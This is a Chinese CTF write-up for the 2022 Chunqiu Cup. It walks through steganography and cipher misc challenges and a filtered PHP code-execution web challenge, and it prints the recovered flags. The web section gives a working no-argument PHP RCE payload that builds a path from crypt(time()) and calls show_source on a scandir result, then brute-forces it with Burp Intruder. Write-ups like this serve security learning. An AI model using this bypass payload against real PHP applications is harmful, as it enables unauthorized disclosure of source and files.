shenghuo2's Blog
shenghuo2's Blog

春秋杯秋季赛2022-5-7 WP

shenghuo2 shenghuo2 收录于 Writeup
  约 400 字 预计阅读 1 分钟 
警告
本文最后更新于 2023-01-29,文中内容可能已过时。

misc

签到

关注“春秋伽玛”公众号,回复“上课铃声”

得到乐谱

在环境里面按出来就行

tiger

按照提示 把png-key.txt里面的值rot47得到key

1

28a217fe

然后用cloack pixel解带密码的lsb隐写

1

python lsb.py extract key.png-stego.png output.txt 28a217fe

打开txt 得到压缩包密码

1

71zr9H6jnXRHn64WBxMbCzz16saCZWiw

解压得到

image-20220507130927864

key里面文件和flag里面的information一样 用明文爆破

得到密码

得到一个二维码

扫码得到的数据解零宽隐写 因为有u+200F 要用这个网址

https://yuanfux.github.io/zero-width-web/

1

Owl wvn n xhkm SBWav krttqbu gfq gja jhheu up yljycxjpu, vvtx R jzeh pydv usd zp lalhmk, ic brtkac ya whep{866q3755-t358-5119-txnr-juw666e8099m}, uroa okv!

再爆破维吉尼亚

https://www.guballa.de/vigenere-solver

1

You are a good CTFer because you can solve my challenge, next I will give you my secret, my secret is flag{866d3755-c358-5119-abeb-bda666a8099d}, have fun!

web

Mercy-code

image-20220507215410401

一个过滤很多的无参rce

一般都是条件竞争

1

cmd=var_dump(show_source(pos(array_reverse(scandir(chr(ord(hebrev(crypt(time())))))))));

intruder爆破就行

看返回结果length为2772的就是flag

image-20220507215701689

更新于 2023-01-29 
CC BY-NC-SA 4.0
返回 | 主页
0%